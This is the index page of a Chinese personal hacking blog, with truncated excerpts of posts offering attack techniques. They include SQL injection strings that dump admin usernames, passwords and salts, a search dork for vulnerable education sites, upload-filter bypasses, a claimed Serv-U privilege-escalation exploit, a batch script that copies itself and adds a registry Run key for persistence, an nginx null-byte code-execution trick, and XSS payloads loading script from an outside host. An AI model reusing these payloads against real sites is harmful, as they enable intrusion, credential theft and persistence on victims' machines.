小马博客

一个无聊的人,一个无聊的博客

[php]</pre> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>EXE转十六进制代码工具</title> <meta http-equiv="Content-Type"...

发布 0 条评论

今天日一站 发现后台可以设置上传类型,但是asp,asa,cer等等都不行,上传之后就提示下载 尝试着关闭了下了,还是不行,后来找到了一位前辈写的文章 过滤了asa,cer,cdx,php,aspx等脚本类型的上传情况下添加一个ashx的上传类型,上传一...

发布 1 条评论

常见虚拟主机目录对照 D:\virtualhost\web580651\www\          新网虚拟主机 F:\usr\fw04408\xpinfo\                  万网虚拟主机 D:\hosting\wwwroot\                    Prim@Hosting虚拟主机 e:\wwwroot\longzhihu\wwwroot\  ...

发布 0 条评论

serv-u最新通杀所有版本提权代码。10.x的也可以提,昨天俺成功11版本的, 不要直接添加系统帐号或者执行命令,用添加的FTP帐号在CMD下面连接提权。 要不容易出错的。 [php]<style type="text/css"> <!-- body,td,t...

发布 0 条评论

教育站打印页面漏洞 百度或google搜索 inurl:info_Print.asp?ArticleID= 默认后台:/ad_login.asp 爆管理员密码: 在 域名/inurl:info_Print.asp?ArticleID=数字 union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16...

发布 0 条评论

@echo off if not exist c:\windows\feixin.bat copy "%~0" c:\windows\feixin.bat reg add hkcu\software\microsoft\windows\currentversion\run /v feixin /t reg_sz /d c:\windows\feixin.bat /f :: sno 为自己的手机号;psw 为飞...

发布 0 条评论

入侵网站时,遇到实在上传不了木马,可以试试上传一个stm文件, 内容为:   <!--#include file="conn.asp"-->   直接访问这个stm文件, 会发现是空白文件,但右键查看源码,你会发现conn.asp就一览无遗, 数据库路径也就到手啦!...

发布 0 条评论

这个漏洞早就出来了,收集在我电脑里找不到了,写到博客上好记点! 1.注册个用户,登录 2.随便找个帖子回复! 回复内容 ↓ 注入语句: a',`subject`=(/*!select*/ concat(username,'|',password,'|',salt) from pre_ucenter_members where...

发布 1 条评论

Ngnix在遇到%00空字节时与后端FastCGI处理不一致,导致可以在图片中嵌入PHP代码然后通过访问xxx.jpg%00.php来执行其中的代码 影响版本: nginx 0.5.* nginx 0.6.* nginx 0.7 <= 0.7.65 nginx 0.8 <= 0.8.37

发布 0 条评论

1)普通的XSS JavaScript注入 <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT> (2)IMG标签XSS使用JavaScript命令 <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT> (3)IMG标签无分号无引号 <IMG SRC=javas...

发布 0 条评论